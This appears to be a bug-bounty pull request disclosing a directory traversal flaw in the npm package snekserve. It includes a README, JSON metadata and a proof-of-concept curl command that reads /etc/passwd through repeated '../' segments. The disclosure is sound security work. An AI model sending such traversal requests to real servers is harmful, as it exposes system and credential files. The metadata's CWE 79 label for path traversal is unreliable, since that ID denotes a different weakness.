### PR TITLE
Report Directory Traversal in Snek-Serve

### DIFF
--- a/bounties/npm/snekserve/2/README.md
+++ b/bounties/npm/snekserve/2/README.md
@@ -1,0 +1,11 @@
+# Description
+
+The `snekserve` project is a `directory listing` server which is vulnerable against Directory Traversal, which may allow access to sensitive files and data on the server.
+ For example, requesting the following URL: `/../../etc/passwd` would result in `/etc/passwd` leaking.
+
+
+# POC
+
+  1. Start the server node index.js
+  2. `curl -v --path-as-is http://127.0.0.1:8080/../../../../../../../../../../../etc/passwd`
+  3. `/etc/passwd` of the current user will be displayed.

--- a/bounties/npm/snekserve/2/vulnerability.json
+++ b/bounties/npm/snekserve/2/vulnerability.json
@@ -1,0 +1,50 @@
+{
+    "PackageVulnerabilityID": "2",
+    "DisclosureDate": "2020-08-09",
+    "AffectedVersionRange": "*",
+    "Summary": "Path Traversal on \"snekserve\"",
+    "Contributor": {
+        "Discloser": "alromh87",
+        "Fixer": ""
+    },
+    "Package": {
+        "Registry": "npm",
+        "Name": "snekserve",
+        "URL": "https://www.npmjs.com/package/snekserve",
+        "Downloads": "126"
+    },
+    "CWEs": [
+        {
+            "ID": "79",
+            "Description": "Path traversal through usage of \"../\""
+        }
+    ],
+    "CVSS": {
+        "Version": "",
+        "AV": "",
+        "AC": "",
+        "PR": "",
+        "UI": "",
+        "S": "",
+        "C": "",
+        "I": "",
+        "A": "",
+        "E": "",
+        "RL": "",
+        "RC": "",
+        "Score": "3.8"
+    },
+    "CVEs": [],
+    "Repository": {
+        "URL": "https://github.com/lap00zza/Snek-Serve",
+        "Codebase": [
+            "JavaScript"
+        ],
+        "Owner": "lap00zza",
+        "Name": "Snek-Serve",
+        "Forks": 2,
+        "Stars": 0
+    },
+    "Permalinks": [],
+    "References": []
+}


### PR DESCRIPTION
The `snekserve` project is a `directory listing` server which is vulnerable against Directory Traversal, which may allow access to sensitive files and data on the server.
 For example, requesting the following URL: `/../../etc/passwd` would result in `/etc/passwd` leaking.


# POC

  1. Start the server node index.js
  2. `curl -v --path-as-is http://127.0.0.1:8080/../../../../../../../../../../../etc/passwd`
  3. `/etc/passwd` of the current user will be displayed.
![Captura de pantalla de 2020-09-08 22-32-21](https://user-images.githubusercontent.com/7505980/92519789-3e3a3280-f223-11ea-9790-588f2b44dc2b.png)
